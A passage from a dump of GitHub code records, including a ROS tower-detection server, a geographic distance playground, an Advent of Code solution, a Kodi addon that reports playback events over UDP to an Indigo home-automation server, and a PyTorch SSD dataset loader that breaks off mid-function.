self.TOWER_MIDDLE\n elif self.checkColor(self.cv_image[y, x], self.color_indices[2]):\n click_index = self.TOWER_LOWEST\n if click_index == self.S_TOWER:\n msg = \"the tower the user clicked equals to the start tower\"\n rospy.logerr(msg)\n return CheckCircleResponse(False, click_index, msg)\n else:\n return CheckCircleResponse(click_index != -1, click_index, \"\")\n def checkColor(self, image_color, array_color):\n return (image_color[0] == array_color[0] and \n image_color[1] == array_color[1] and \n image_color[2] == array_color[2])\n def clickCB(self, msg):\n (width, height) = cv.GetSize(self.cv_image)\n # msg.x and msg.y is on a relative coordinate (u, v)\n x = int(width * msg.x)\n y = int(height * msg.y)\n output_str = str([x, y]) + \" - \" + str(self.cv_image[y, x])\n click_index = -1\n if self.checkColor(self.cv_image[y, x], self.color_indices[0]):\n output_str = output_str + \" cluster00 clicked\"\n click_index = self.TOWER_HIGHEST\n elif self.checkColor(self.cv_image[y, x], self.color_indices[1]):\n output_str = output_str + \" cluster01 clicked\"\n click_index = self.TOWER_MIDDLE\n elif self.checkColor(self.cv_image[y, x], self.color_indices[2]):\n output_str = output_str + \" cluster02 clicked\"\n click_index = self.TOWER_LOWEST\n self.browser_message_pub.publish(String(output_str))\n def imageCB(self, data):\n try:\n self.cv_image = self.bridge.imgmsg_to_cv(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n def publishState(self):\n self.state.publish()\n def spin(self):\n while not rospy.is_shutdown():\n for c in self.circles:\n c.publish()\n self.publishState()\n rospy.sleep(1.0)\n\ndef main():\n rospy.init_node(\"tower_detect_viewer_server\")\n server = TowerDetectViewerServer()\n server.spin()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jsk-ros-pkg/jsk_recognition","sub_path":"jsk_pcl_ros/scripts/tower_detect_viewer_server.py","file_name":"tower_detect_viewer_server.py","file_ext":"py","file_size_in_byte":13745,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"31"} +{"seq_id":"23777903278","text":"#!/usr/bin/env python\n\n# testing ground\n\nfrom scipy.spatial import cKDTree\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nfrom PIL import Image, ImageFilter\n\n# from pykdtree.kdtree import KDTree\n\n# gigapixel for the win\n\nImage.MAX_IMAGE_PIXELS = 10**9\n\n# the primary image (using smallest version for testing)\n\nimage = \"usa-raster-flat-5400.png\"\n\n# load the primary image and turn it into an array\n\nimMain = Image.open(image)\npixelsMain = np.array(imMain)\n\n# compute the latitudes and longitudes of the center of each pixel in degrees\n\nwidth, height = (imMain.size)\n\nprint(\"WH:\",width,height)\n\n# the - in lats is because the latitudes start at 90 and go down\n\n# the (180|360)/(height|width)/2 is to get the center of the pixel\n\nlats = -np.arange(-90, 90, 180./height)-180./height/2\nlngs = np.arange(-180, 180, 360./width)+360./width/2\n\n# convert to radians\n\nlats = lats/180*np.pi\nlngs = lngs/180*np.pi\n\n# meshgrid so we have lng and lat for each pixel\n\nlngs, lats = np.meshgrid(lngs, lats)\n\n# project these points into 3D space assuming Earth is a sphere; the unit here is Earth radii, so the radius of the sphere is 1 (for now)\n\nx = np.cos(lats)*np.cos(lngs)\ny = np.cos(lats)*np.sin(lngs)\nz = np.sin(lats)\n\n# reshape to a list of points\n\nptsAll = np.column_stack([x.flatten(), y.flatten(), z.flatten()])\n\n# find the boundary points' and then their pixel coordinates\n\nim = imMain.filter(ImageFilter.FIND_EDGES)\npixels = np.array(im)\nlit = np.where(pixels != 0)\n\n# take just the lit pixels from the 3D array we created earlier\n\nxLit = x[lit[0],lit[1]]\nyLit = y[lit[0],lit[1]]\nzLit = z[lit[0],lit[1]]\n\n# reshape the points and create a KDTree on them\n\npts3d = np.column_stack([xLit.flatten(), yLit.flatten(), zLit.flatten()])\n\n# tree = cKDTree(pts3d)\n\nprint(\"START\")\n\ntree = cKDTree(pts3d)\n\n# tree2 = cKDTree(ptsAll)\n\n# since all points are within distance 2 on the unit sphere, this doesn't place a restriction, but does speed up the queries\n\nres = tree.query(ptsAll, n_jobs=-1, distance_upper_bound=2)\n\nprint(\"END\")\n\n# def query_tree(point):\n# return tree.query(point, k=1)\n\n# from concurrent.futures import ProcessPoolExecutor\n# with ProcessPoolExecutor(max_workers=None) as executor:\n# res = executor.map(query_tree, ptsAll)\n\n# res2 = tree.sparse_distance_matrix(tree2, 1)\n\n# print(res2)\n\n# np.savetxt('/tmp/dist.txt', res[0])\n\n# np.save('/tmp/dist.npy', res[0])\n\n# these are the pixels that are white in the main image\n\n# litMain = np.where(pixelsMain != 0)\n\nexit(0)\n\n# these are the latitudes/longitudes of each pixel in the image\n\n# the top left pixel is 0,0\n\nlats = 90-180*(lit[0]+0.5)/height\n# lngs = 360*(lit[0]+0.5)/width.-180.\n\n# convert to radians\n\n\ngrid = 15\n\nlats = np.linspace(-90, 90, num=grid, endpoint=True)*np.pi/180\nlngs = np.linspace(-180, 180, num=grid, endpoint=True)*np.pi/180\n\nx = np.cos(lngs)*np.cos(lats)\ny = np.cos(lats)*np.sin(lngs)\nz = np.sin(lats)\n\nprint(\"Z\",z)\n\nptsGrid = np.column_stack([x, y, z])\n\nprint(ptsGrid.shape[0])\n\nfor i in range(np.shape(ptsGrid)[0]):\n pt = ptsGrid[i]\n# print(i, np.arcsin(pt[2])/np.pi*180, np.arctan2(pt[1], pt[0])/np.pi*180)\n\n# 1st 180 entries are lng = -180\n\n# 0th element is -90 south\n\n# y=0 means lng is 0, happens at 33123 but other places far away too\n\n# x=0 means lng is 90, happens at \n\nprint(time.time())\n\ndists, idxs = tree.query(ptsGrid)\n\nprint(np.shape(dists))\n\nfor i in range(dists.shape[0]):\n print(i, dists[i], ptsGrid[i])\n\ndists = np.reshape(dists, (grid, grid))\n\nidxs = np.reshape(idxs, (grid, grid))\n\nprint(dists)\n\nfor i in range(dists.shape[0]):\n for j in range(dists.shape[1]):\n lng = j*360/(grid-1)-180\n lat = i*180/(grid-1)-90\n dist = 8000*2*np.arcsin(dists[j][i]/2)\n idx = idxs[j][i]\n coords = pts3d[idxs[j][i]]\n latusa = np.arcsin(coords[2])\n lngusa = np.arctan2(coords[1], coords[0])\n print(lng, lat, dist, lngusa/np.pi*180, latusa/np.pi*180)\n\nexit(0)\n\nclose = np.where(dists < 0.001)\n\nprint(close)\n\n# min_distances = np.apply_along_axis(tree.query, 1, ptsGrid)\n\n# print(min_distances)\n\nprint(time.time())\n\ndata = np.reshape(dists, (180, 360))\n\nfig, ax = plt.subplots()\n\nax.imshow(data, cmap='rainbow')\n\nfig.savefig(\"random_image.png\")\n","repo_name":"barrycarter/PolygonDistances","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12053374195","text":"import sys\nsys.path.append(\"../2020\")\nimport utils.utils as utils\n\ndef tick(grid):\n \"\"\"\n A light which is on stays on when 2 or 3 neighbors are on, and turns off otherwise.\n A light which is off turns on if exactly 3 neighbors are on, and stays off otherwise.\n \"\"\"\n next_grid = {}\n for y in grid:\n next_grid[y] = {}\n for x in grid[y]:\n ct = 0\n for yi in (y-1, y, y+1):\n if yi in grid:\n ya = grid[yi]\n for xi in (x-1, x, x+1):\n if not (xi == x and yi == y):\n if xi in ya:\n if ya[xi] == \"#\":\n ct += 1\n if grid[y][x] == \"#\":\n if ct == 2 or ct == 3:\n next_grid[y][x] = \"#\"\n else:\n next_grid[y][x] = \".\"\n else:\n if ct == 3:\n next_grid[y][x] = \"#\"\n else:\n next_grid[y][x] = \".\"\n\n return next_grid\n\ndef test_day_eighteen():\n grid = utils.file_to_grid(\"Day18sample.txt\")\n for i in range(0, 4):\n grid = tick(grid)\n \n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\ndef test_day_eighteen_part_two():\n grid = utils.file_to_grid(\"Day18sample.txt\")\n grid[0][0] = \"#\"\n grid[0][5] = \"#\"\n grid[5][0] = \"#\"\n grid[5][5] = \"#\"\n for i in range(0, 5):\n grid = tick(grid)\n grid[0][0] = \"#\"\n grid[0][5] = \"#\"\n grid[5][0] = \"#\"\n grid[5][5] = \"#\"\n \n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\ndef day_eighteen():\n grid = utils.file_to_grid(\"Day18.txt\")\n for i in range(0, 100):\n grid = tick(grid)\n \n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\ndef day_eighteen_part_two():\n grid = utils.file_to_grid(\"Day18.txt\")\n grid[0][0] = \"#\"\n grid[0][99] = \"#\"\n grid[99][0] = \"#\"\n grid[99][99] = \"#\"\n for i in range(0, 100):\n grid = tick(grid)\n grid[0][0] = \"#\"\n grid[0][99] = \"#\"\n grid[99][0] = \"#\"\n grid[99][99] = \"#\"\n s = 0\n for y in grid:\n for x in grid[y]:\n if grid[y][x] == \"#\":\n s += 1\n print(s)\n\nif __name__==\"__main__\":\n test_day_eighteen()\n day_eighteen()\n test_day_eighteen_part_two()\n day_eighteen_part_two()","repo_name":"dratcliff/advent-of-code","sub_path":"aoc-old/2015/Day18.py","file_name":"Day18.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32659680642","text":"###############################################################################\n# This Addon:\n# Inspired by \"XBMCState Vera Plugin XBMC Addon\"\n# Thanks to chixxi for the vera plugin and jordan Hackworth for the script idea\n# http://www.jordanhackworth.com/home-automation-with-xbmc/\n# http://windowsmediacenter.blogspot.co.uk/2013/02/xbmc-vera-home-automationbasic.html\n# http://apps.mios.com/plugin.php?id=3346\n###############################################################################\n\n###############################################################################\n# XBMC Reference\n#\n# http://mirrors.xbmc.org/docs/python-docs/frodo/\n# https://github.com/xbmc/xbmc/blob/master/xbmc/interfaces/json-rpc/PlayerOperations.cpp \n# https://github.com/xbmc/xbmc/blob/master/xbmc/cores/IPlayerCallback.h \n# https://github.com/xbmc/xbmc/blob/master/xbmc/guilib/WindowIDs.h\n# https://github.com/jaredquinn/xbmcshell/blob/master/xbmcshell\n###############################################################################\n\nimport sys\nimport xbmc\nimport xbmcgui \nimport xbmcaddon\nimport time\nimport socket\nimport json\nimport re\n\nsettings = xbmcaddon.Addon(id='service.indigo')\nindigo_ip = settings.getSetting( \"indigo_ip\" )\nindigo_port = settings.getSetting( \"indigo_port\" )\n\ndebouncing_video = 0 #float(settings.getSetting( \"debounce_video\"))\ndebouncing_audio = 0 #float(settings.getSetting( \"debounce_audio\"))\n\n__addonname__ = settings.getAddonInfo('name')\n__icon__ = settings.getAddonInfo('icon')\n\nplugin_start = \"Plugin started\"\nplugin_error = \"Please insert Indigo information in the addon setting\"\ntime1 = 5000\ntime2 = 3000\n\nsock = None\ndebugMode = False\nsettingsOK = False\nlastMedia = \"\"\nlastMenu = \"\"\nlastTitle = \"\"\nlastVolume = 0\n\nlastMuted = False\ncurrMedia = \"\"\ncurrTitle = \"\"\ncurrVolume = 0\ncurrMuted = False\nlastWindow = 0\npulseMax = 15\npulseAlive = 0\n\nMAJOR = 0\nMINOR = 0\nDHARMA = False \nEDEN = False\nFRODO = False\nGOTHAM = False\nHELIX = False\nISENGARD = False\nJARVIS = False\n \n\ndef get_installedversion():\n #http://www.tayunsmart.com/otaupdate/xbmc/s9/addons/plugin.program.super.favourites/utils.py\n version_installed = []\n\n xQuery = xbmc.executeJSONRPC('{ \"jsonrpc\": \"2.0\", \"method\": \"Application.GetProperties\", \"params\": {\"properties\": [\"version\", \"name\"]}, \"id\": 1 }')\n xQuery = unicode(xQuery, 'utf-8', errors='ignore')\n xQuery = json.loads(xQuery)\n \n if xQuery.has_key('result') and xQuery['result'].has_key('version'):\n version_installed = xQuery['result']['version']\n\n return version_installed\n\ndef debugLog (message):\n global debugMode\n if debugMode == True:\n print('Indigo.Service: ' + message) \n\ndef errorLog (message):\n print('Indigo.Service.ERROR: ' + message) \n\ndef indigoSendMsg(message):\n global sock\n try:\n sock.sendto (message, (indigo_ip , int(indigo_port)))\n debugLog ('Sent message to Indigo: ' + message) \n except socket.error:\n errorLog ('indigoSendMsg. Socket error: ' + str(sys.exc_info()[1][0]) + ',' + str(sys.exc_info()[1][1] ))\n\ndef notifyEventApp(event):\n debugLog ('notifyEventApp(' + event + ')') \n event = event.lower()\n message = 'app'\n message = message + '' + event + ''\n indigoSendMsg(message)\n\ndef notifyEventPlayer(event, media):\n global currTitle\n global currVolume\n debugLog ('notifyEventPlayer(' + event + ',' + media + ')')\n event = event.lower() \n message = 'player'\n message = message + '' + event + ''\n message = message + '' + media + ''\n message = message + '' + currTitle + ''\n indigoSendMsg(message)\n\ndef notifyEventMenu(event): \n debugLog ('notifyEventMenu(' + event + ')')\n event = event.lower()\n message = 'menu'\n message = message + '' + event + ''\n indigoSendMsg(message)\n \ndef notifyEventVolume(volume,muted): \n debugLog ('notifyEventVolume(' + str(volume) + ')')\n message = 'volume'\n message = message + '' + str(volume) + ''\n message = message + '' + str(muted).lower() + ''\n indigoSendMsg(message)\n\ndef notifyEventTitle(title): \n debugLog ('notifyEventTitle(' + title + ')')\n title = title.strip()\n if title == '':\n title = '.'\n message = 'title'\n message = message + '' + title + ''\n indigoSendMsg(message)\n\ndef checkEventMenu(event):\n global lastMenu\n if event != lastMenu:\n debugLog ('Menu changed from ' + lastMenu + ' to ' + event) \n notifyEventMenu (event)\n lastMenu = event\n\ndef checkEventVolume():\n global lastVolume\n global lastMuted\n\n xVolume = 0\n xMute = False\n\n xVolume, xMuted = getCurrentVolume()\n if (xVolume != lastVolume) or (xMuted != lastMuted):\n notifyEventVolume(xVolume,xMuted)\n\n lastVolume = xVolume\n lastMuted = xMuted\n\ndef checkEventTitle():\n global currTitle\n\n if xbmc.Player().isPlaying(): \n xTitle = getCurrentMediaTitle()\n if (xTitle != currTitle) :\n notifyEventTitle(xTitle)\n currTitle = xTitle\n\ndef getCurrentMediaType():\n global lastMenu\n global lastWindow\n\n lMedia = 'none'\n lWindow = xbmcgui.getCurrentWindowId()\n\n if xbmc.Player().isPlaying(): \n if xbmc.Player().isPlayingVideo():\n if xbmc.getCondVisibility('VideoPlayer.Content(episodes)'): \n if xbmc.getInfoLabel('VideoPlayer.Season') != \"\" and xbmc.getInfoLabel('VideoPlayer.TVShowTitle') != \"\":\n lMedia = 'tvshow' \n if xbmc.getCondVisibility('VideoPlayer.Content(livetv)'): \n lMedia = 'livetv' \n if lMedia == 'none': \n lMedia = 'video'\n if lWindow == 10614:\n lMedia = 'livetv'\n #if xbmc.Pvr().IsPlayingTv(): \n # lMedia = 'livetv' \n if xbmc.Player().isPlayingAudio():\n if xbmc.getCondVisibility('VideoPlayer.Content(livetv)'): \n lMedia = 'radio'\n else:\n lMedia = 'audio' \n if lWindow > 10613 and lWindow <= 10618:\n lMedia = 'livetv' \n if lWindow >= 10694 and lWindow <= 10699:\n lMedia = 'livetv' \n if lastMenu == 'livetv':\n lMedia = 'livetv' \n \n return lMedia\n\ndef getCurrentVolume():\n xQuery = ''\n xResult = ''\n xVolume = 0\n xMuted = False\n\n try:\n xQuery = '{\"jsonrpc\": \"2.0\", \"method\": \"Application.GetProperties\", \"params\": { \"properties\": [ \"volume\", \"muted\" ] }, \"id\": 1}'\n xResult = xbmc.executeJSONRPC( xQuery )\n xMatch = re.search( '\"volume\": ?([0-9]{1,3})', xResult )\n xVolume = int(xMatch.group(1)) \n if bool (re.search ('\"muted\": true',xResult)):\n xMuted = True\n except:\n xVolume = lastVolume\n xMuted = lastMuted\n pass\n\n return xVolume, xMuted\n\n\ndef getCurrentMediaTitle():\n lTitle = '' \n try:\n lMedia = getCurrentMediaType()\n if lMedia == 'tvshow':\n lTitle = xbmc.getInfoLabel('VideoPlayer.TVShowTitle')\n if lTitle > '':\n lTitle = lTitle + ': ' + xbmc.getInfoLabel('VideoPlayer.Title') \n if lMedia == 'livetv':\n lTitle = xbmc.getInfoLabel('VideoPlayer.ChannelName') \n if lTitle > '':\n lTitle = lTitle + ': ' + xbmc.getInfoLabel('VideoPlayer.Title') \n if lMedia == 'radio':\n lTitle = xbmc.getInfoLabel('MusicPlayer.ChannelName')\n if lTitle == '': \n if xbmc.Player().isPlaying(): \n if xbmc.Player().isPlayingVideo():\n lTitle = xbmc.getInfoLabel('VideoPlayer.Title') \n if xbmc.Player().isPlayingAudio():\n lTitle = xbmc.getInfoLabel('MusicPlayer.Title')\n except:\n lTitle = ''\n lTitle = lTitle.replace('<', '')\n lTitle = lTitle.replace('>', '')\n lTitle = lTitle.replace('&', '')\n return lTitle\n\ndef watchNavigation():\n global lastMedia\n global lastMenu\n global lastWindow\n global lastVolume\n global lastMuted\n\n checkEventVolume()\n checkEventTitle()\n\n currWindow = (xbmcgui.getCurrentWindowId())\n if lastWindow == currWindow:\n return\n lastWindow = currWindow\n debugLog ('Current Window ID = ' + str(currWindow))\n \n # menu Home\n if currWindow == 10000:\n checkEventMenu ('home')\n if currWindow == 10001:\n checkEventMenu ('program')\n if currWindow == 10002:\n checkEventMenu ('picture')\n\n # menu Sistema \n if currWindow == 10004:\n checkEventMenu ('settings')\n if currWindow == 10007:\n checkEventMenu ('settings')\n if (currWindow >= 10012) and (currWindow <= 10019):\n checkEventMenu ('settings')\n if currWindow == 10021:\n checkEventMenu ('settings') \n\n # menu PVR\n if (currWindow >= 10601) and (currWindow <= 10626):\n checkEventMenu ('livetv')\n \n # menu Video\n if currWindow == 10006:\n checkEventMenu ('video')\n if currWindow == 10024:\n checkEventMenu ('video')\n if currWindow == 10025:\n checkEventMenu ('video')\n if currWindow == 10028:\n checkEventMenu ('video')\n\n # Menu audio \n if currWindow == 10005:\n checkEventMenu ('music')\n if currWindow == 10500:\n checkEventMenu ('music')\n if currWindow == 10501:\n checkEventMenu ('music')\n if currWindow == 10502:\n checkEventMenu ('music')\n\n # Menu Meteo\n if currWindow == 12600:\n checkEventMenu ('weather')\n\n lastWindow = currWindow\n\n#class MyApplication(xbmc.Application): \n \n# def __init__ (self): \n# xbmc.Application.__init__(self) \n\n# def OnVolumeChanged \n\nclass MyPlayer(xbmc.Player): \n def __init__ (self): \n xbmc.Player.__init__(self) \n debugLog ('Player init') \n \n def onPlayBackStarted(self):\n global currMedia\n global currTitle\n\n xbmc.sleep (250)\n media = getCurrentMediaType()\n currTitle = getCurrentMediaTitle() \n notifyEventPlayer ('onPlayBackStarted',media)\n currMedia = media\n\n def onPlayBackEnded(self): \n global currMedia\n if (currMedia == \"video\") or (currMedia == 'tvshow'):\n time.sleep(debouncing_video)\n if not xbmc.Player().isPlaying(): \n notifyEventPlayer ('onPlayBackEnded',currMedia)\n\n if (currMedia == \"audio\"):\n time.sleep(debouncing_audio)\n if not xbmc.Player().isPlaying():\n notifyEventPlayer ('onPlayBackEnded',currMedia)\n currMedia = 'none' \n currTitle = \"\"\n \n def onPlayBackStopped(self):\n global currMedia\n global currTitle\n notifyEventPlayer ('onPlayBackStopped',currMedia) \n currTitle = \"\" \n currMedia = \"none\" \n \n def onPlayBackPaused(self): \n global currMedia \n notifyEventPlayer ('onPlayBackPaused',currMedia) \n \n def onPlayBackResumed(self):\n global currMedia\n notifyEventPlayer ('onPlayBackResumed',currMedia)\n \n def OnQueueNextItem(self):\n debugLog ('Player.OnQueueNextItem') \n \n def onPlayBackEnded(self, time):\n debugLog ('Player.onPlayBackEnded') \n \n def onPlayBackSeek(self, time, seekOffset):\n debugLog ('Player.onPlayBackSeek')\n \n def onPlayBackSeekChapter(self, chapter):\n debugLog ('Player.onPlayBackSeekChapter') \n\nclass MyMonitor( xbmc.Monitor ):\n def __init__( self, *args, **kwargs ):\n xbmc.Monitor.__init__( self )\n debugLog ('Monitor.init') \n \n def onSettingsChanged( self ):\n #settings.start()\n #if not settings.reconnect:\n # check_state()\n debugLog ('Monitor.onSettingsChanged') \n\n def onScreensaverDeactivated( self ): \n debugLog ('Monitor.onScreensaverDeactivated') \n \n def onScreensaverActivated( self ): \n debugLog ('Monitor.onScreensaverActivated') \n \n \n\n###################################################### \n# Inicio del Addon\n######################################################\n\nif (str(settings.getSetting(\"debug_mod\")) == \"Yes\"):\n debugMode = True\nelse:\n debugMode = False\n\ndebugLog ('Service starts')\n\ntry: \n version_installed = get_installedversion() \n if version_installed.has_key('major'):\n MAJOR = int(version_installed['major'])\n MINOR = int(version_installed['minor'])\nexcept:\n MAJOR = 0 \n MINOR = 0\n\ndebugLog ('Kodi release = ' + str(MAJOR) + '.' + str(MINOR)) \n\nDHARMA = (MAJOR < 11) \nEDEN = (MAJOR == 11)\nFRODO = (MAJOR == 12) and (MINOR < 9)\nGOTHAM = (MAJOR == 13) or (MAJOR == 12 and MINOR == 9)\nHELIX = (MAJOR == 14)\nISENGARD = (MAJOR == 15)\nJARVIS = (MAJOR > 15)\n\nif DHARMA:\n debugLog ('Kodi release = Dharma')\nif FRODO:\n debugLog ('Kodi release = Frodo')\nif GOTHAM:\n debugLog ('Kodi release = Gotham')\nif HELIX:\n debugLog ('Kodi release = Helix')\nif ISENGARD:\n debugLog ('Kodi release = Isengard')\nif JARVIS:\n debugLog ('Kodi release = Jarvis')\n\n\nlastMedia = \"none\"\nlastMenu = \"none\"\nlastTitle = \"\"\ncurrMedia = \"none\"\nlastWindow = 0\n\nsettingsOK = True\nif (indigo_ip == \"0.0.0.0\") or (indigo_ip == \"\"):\n settingsOK = False\n errorLog ('Settings: Indigo IP address is empty')\nif int(indigo_port <= 0): \n settingsOK = False\n errorLog ('Settings: Indigo UDP Port is empty')\n\nif (str(settings.getSetting(\"notification\")) == \"Yes\"):\n if settingsOK == False: \n xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,plugin_error, time1, __icon__))\n else:\n xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,plugin_start, time2, __icon__))\n\nif settingsOK == False:\n errorLog ('indigoSendMsg. Exit. Settings are not Ok')\n sys.exit()\n\nplayer = MyPlayer() \nmonitor = MyMonitor() \n\n#########################################################\n# This socket uses DataGram. (UDP connectionless)\n#########################################################\n\ntry:\n debugLog ('Creating socket')\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n debugLog ('Socket created')\nexcept socket.error:\n errorLog ('Socket error: ' + indigo_ip + \":\" + indigo_port + ' ... ' + str(sys.exc_info()[1][1] ))\n pass\n\n#########################################################\n# Bucle principal\n#########################################################\n\nif sock != None:\n lastVolume, lastMuted = getCurrentVolume()\n notifyEventApp('start')\n notifyEventVolume(lastVolume,lastMuted)\n if DHARMA or EDEN or FRODO or GOTHAM:\n while (not xbmc.abortRequested):\n watchNavigation()\n xbmc.sleep(300)\n if HELIX or ISENGARD or JARVIS:\n while (not monitor.abortRequested()):\n if monitor.waitForAbort(0.3):\n break\n pulseAlive = pulseAlive + 1\n if pulseAlive > pulseMax:\n notifyEventApp('alive')\n pulseAlive = 0 \n watchNavigation() \n \n notifyEventApp('quit')\ndebugLog ('Service quits')\n\n\n","repo_name":"tenallero/Indigo-XBMC","sub_path":"KodiService/service.indigo/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":17852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36321712135","text":"# put your python code here\nwalk_hours = int(input())\nwalk_minutes = int(input())\nwalk_seconds = int(input())\nrain_hours = int(input())\nrain_minutes = int(input())\nrain_seconds = int(input())\nwalk_time = walk_hours*3600 + walk_minutes*60 + walk_seconds\nrain_time = rain_hours*3600 + rain_minutes*60 + rain_seconds\nprint(rain_time - walk_time)\n","repo_name":"kb1hyr/Simple_Chatty_Bot","sub_path":"Problems/Difference of times/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70304722969","text":"# !/usr/bin/env python\n# -*-coding:utf-8 -*-\n\n\"\"\"\n# File : ssd_dataset.py\n# Author :CodeCat\n# version :python 3.7\n# Software :Pycharm\n\"\"\"\nfrom cv2 import cv2\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\nfrom .data_utils import cvtColor, preprocess_input\n\n\nclass SSDDataset(Dataset):\n def __init__(\n self,\n annotation_lines,\n input_shape,\n anchors,\n num_classes,\n train,\n overlap_threshold=0.5\n ):\n super(SSDDataset, self).__init__()\n self.annotation_lines = annotation_lines\n self.input_shape = input_shape\n self.anchors = anchors\n self.num_anchors = len(anchors)\n self.num_classes = num_classes\n self.train = train\n self.overlap_threshold = overlap_threshold\n\n def __len__(self):\n return len(self.annotation_lines)\n\n def __getitem__(self, index):\n index = index % len(self.annotation_lines)\n # image: 300x300x3; box: (num_box, 5)\n # 5: xmin, y_min, x_max, y_max, class_idx\n image, box = self.get_random_data(self.annotation_lines[index], self.input_shape, is_image_enhance=self.train)\n # image: 3x300x300\n image_data = np.transpose(preprocess_input(np.array(image, dtype=np.float32)), (2, 0, 1))\n if len(box) != 0:\n # 取出真实框的位置信息\n boxes = np.array(box[:, :4], dtype=np.float32)\n # 归一化处理\n boxes[:, [0, 2]] /= self.input_shape[1]\n boxes[:, [1, 3]] /= self.input_shape[0]\n # 对真实框的种类进行one hot处理,\n one_hot_label = np.eye(self.num_classes-1)[np.array(box[:, 4], np.int32)]\n # 拼接后的形状为 (num_box, 4+20)\n box = np.concatenate([boxes, one_hot_label], axis=-1)\n\n box = self.assigin_boxer(box)\n return np.array(image_data), np.array(box)\n\n\n @staticmethod\n def rand(a=0, b=1):\n return np.random.rand()*(b - a) + a\n\n def get_random_data(\n self,\n annotation_line,\n input_shape,\n jitter=.3,\n hue=.1,\n sat=1.5,\n val=1.5,\n is_image_enhance=True\n ):\n # line 表示训练txt文件的某一行\n # 这一行的第一个表示图像的路径,后面的以(x_min, y_min, y_max, y_max, class_idx)表示一个真实框\n line = annotation_line.split()\n # 读取图片并转换为RGB格式\n image = Image.open(line[0])\n image = cvtColor(image)\n # 获取图像的宽,高\n img_w, img_h = image.size\n # 获取输入到SSD网络中图像的高,宽\n h, w = input_shape\n # 提取line后面的真实框,box shape:(num_box, 5)\n box = np.array([np.array(list(map(int, box.split(',')))) for box in line[1:]])\n\n if not is_image_enhance:\n # 将图像的尺寸缩放到输入到SSD网络中的尺寸\n scale = min(w / img_w, h / img_h)\n new_w = int(img_w * scale)\n new_h = int(img_h * scale)\n dx = (w - new_w) // 2\n dy = (h - new_h) // 2\n\n # 将图像resize到指定尺寸\n image = image.resize((new_w, new_h), Image.BICUBIC)\n # 新创建一个图像,全灰色\n new_image = Image.new(mode='RGB', size=(w, h), color=(128, 128, 128))\n # 将图像粘贴到新建图像的中心\n new_image.paste(image, (dx, dy))\n image_data = np.array(new_image, np.float32)\n\n # 将图像的真实框进行对应的缩放,并限制其超出边界\n if len(box) > 0:\n np.random.shuffle(box)\n box[:, [0, 2]] = box[:, [0, 2]] * new_w / img_w + dx\n box[:, [1, 3]] = box[:, [1, 3]] * new_h / img_h + dy\n box[:, 0:2][box[:, 0:2] < 0] = 0\n box[:, 2][box[:, 2] > w] = w\n box[:, 3][box[:, 3] > h] = h\n box_w = box[:, 2] - box[:, 0]\n box_h = box[:, 3] - box[:, 1]\n # 滤除较小的框\n box = box[np.logical_and(box_w > 1, box_h > 1)]\n\n return image_data, box\n\n # 对图��进行缩放并且进行长和宽的扭曲\n new_ar = w / h * self.rand(1 - jitter, 1 + jitter) / self.rand(1 - jitter, 1 + jitter)\n scale = self.rand(0.25, 2)\n if new_ar < 1:\n new_h = int(scale * h)\n new_w = int(new_h * new_ar)\n else:\n new_w = int(scale * w)\n new_h = int(new_w / new_ar)\n\n image = image.resize((new_w, new_h), Image.BICUBIC)\n\n # 将图像多余的部分加上灰条\n dx = int(self.rand(0, w - new_w))\n dy = int(self.rand(0, h - new_h))\n new_image = Image.new(mode='RGB', size=(w, h), color=(128, 128, 128))\n new_image.paste(image, (dx, dy))\n image = new_image\n\n # 翻转图像\n flip = self.rand() < 0.5\n if flip:\n image = image.transpose(Image.FLIP_LEFT_RIGHT)\n\n # 色域扭曲\n hue = self.rand(-hue, hue)\n sat = self.rand(1, sat) if self.rand() < 0.5 else 1 / self.rand(1, sat)\n val = self.rand(1, val) if self.rand() < 0.5 else 1 / self.rand(1, val)\n x = cv2.cvtColor(np.array(image, np.float32), cv2.COLOR_RGB2HSV)\n x[..., 0] += hue * 360\n x[..., 0][x[..., 0] > 1] -= 1\n x[..., 0][x[..., 0] < 0] += 1\n x[..., 1] *= sat\n x[..., 2] *= val\n x[x[:, :, 0] > 360, 0] = 360\n x[:, :, 1:][x[:, :, 1] > 1] = 1\n x[x < 0] = 0\n image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB) * 255\n\n if len(box) > 0:\n np.random.shuffle(box)\n box[:, [0, 2]] = box[:, [0, 2]] * new_w / img_w + dx\n box[:, [1, 3]] = box[:, [1, 3]] * new_w / img_w + dy\n if flip:\n box[:, [0, 2]] = w - box[:, [2, 0]]\n box[:, 0:2][box[:, 0:2] < 0] = 0\n box[:, 2][box[:, 2] > w] = w\n box[:, 3][box[:, 3] > h] = h\n box_w = box[:, 2] - box[:, 0]\n box_h = box[:, 3] - box[:, 1]\n box = box[np.logical_and(box_w > 1, box_h > 1)]\n\n return image_data, box\n\n def iou(self, box):\n \"\"\"\n 计算出当前真实框与所有的先验框的iou,判断真实框与先验框的重合情况\n \"\"\"\n # 真实框与先验框重合部分的左上角和右下角\n inter_leftup = np.maximum(self.anchors[:, :2], box[:2])\n inter_rightbottom = np.minimum(self.anchors[:, 2:4], box[2:4])\n # 